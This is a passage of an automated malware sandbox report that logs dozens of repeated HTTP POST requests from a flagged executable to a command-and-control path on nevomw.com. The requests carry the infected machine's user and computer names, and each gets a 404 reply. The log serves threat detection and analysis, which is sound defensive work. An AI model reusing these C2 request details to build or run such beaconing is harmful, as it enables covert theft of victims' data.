                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:58.625736952 CET184OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:58.705684900 CET184INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            37192.168.2.64975345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:58.978022099 CET185OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:59.030513048 CET185OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:59.104919910 CET186INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            38192.168.2.64975445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:59.378493071 CET187OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:59.431277037 CET187OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:59.505511999 CET187INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            39192.168.2.64975545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:59.770770073 CET188OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:59.876540899 CET188OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:59.952721119 CET189INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.64971645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:43.223644972 CET63OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:43.279001951 CET63OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:43.354862928 CET63INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:43 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            40192.168.2.64975645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:00.250977039 CET190OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:00.306401014 CET190OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:00.382494926 CET190INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            41192.168.2.64975745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:00.644083023 CET191OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:00.696590900 CET191OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:00.769340038 CET192INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            42192.168.2.64975845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:01.090385914 CET193OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:01.143268108 CET193OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:01.218769073 CET193INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:01 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            43192.168.2.64975945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:01.537713051 CET194OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:01.590174913 CET194OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:01.667457104 CET195INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:01 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            44192.168.2.64976045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:02.003036022 CET195OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:02.055839062 CET196OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:02.131956100 CET196INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:02 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            45192.168.2.64976145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:02.371231079 CET197OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:02.431969881 CET197OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:02.505198956 CET198INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:02 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            46192.168.2.64976245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:02.962532043 CET198OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:03.015748024 CET199OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:03.089901924 CET199INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            47192.168.2.64976345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:03.392819881 CET200OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:03.445830107 CET200OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:03.522391081 CET200INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            48192.168.2.64976445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:04.207113028 CET201OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:04.260684013 CET202OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:04.333813906 CET202INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:04 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            49192.168.2.64976545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:05.339663982 CET203OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:05.391392946 CET203OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:05.464608908 CET203INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:05 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            5192.168.2.64971745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:43.786463022 CET64OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:43.841705084 CET64OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:43.916834116 CET65INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:43 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            50192.168.2.64976645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:05.740205050 CET204OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:05.793560982 CET204OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:05.865657091 CET205INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:05 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            51192.168.2.64976745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:06.108568907 CET206OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:06.161303043 CET206OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:06.249782085 CET206INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            52192.168.2.64976845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:06.554063082 CET207OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:06.606434107 CET207OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:06.678922892 CET208INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            53192.168.2.64976945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:06.984148026 CET209OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
